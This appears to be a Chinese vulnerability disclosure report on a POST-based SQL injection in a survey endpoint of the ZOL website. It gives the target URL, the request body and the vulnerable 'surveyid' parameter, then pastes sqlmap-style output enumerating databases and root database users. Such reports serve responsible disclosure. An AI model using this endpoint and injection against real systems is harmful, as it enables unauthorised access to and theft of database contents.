中关村在线POST类型SQL注入
简要描述:
中关村在线POST类型SQL注入
详细说明:
URL:http://service.zol.com.cn/survey_new/save_new.php
DATA:curtime=1379865600&q1=35&q2=63&q6=23&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&require_user=0&surveyid=2602&q_num=4&submit=89
注入点 surveyid
漏洞证明:
---
[15:09:46] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[15:09:46] [INFO] fetching database names
[15:09:46] [INFO] fetching number of databases
[15:09:46] [INFO] resumed: 5
[15:09:46] [INFO] resumed: information_schema
[15:09:46] [INFO] resumed: mysql
[15:09:47] [INFO] resumed: pro_vote
[15:09:47] [INFO] resumed: survey
[15:09:47] [INFO] resumed: test
available databases [5]:
[*] information_schema
[*] mysql
[*] pro_vote
[*] survey
[*] test
[15:10:01] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[15:10:01] [INFO] fetching database users
[15:10:01] [INFO] fetching number of database users
[15:10:01] [INFO] resumed: 296
[15:10:01] [INFO] resumed: 'root'@'localhost'
[15:10:01] [INFO] resumed: 'root'@'127.0.0.1'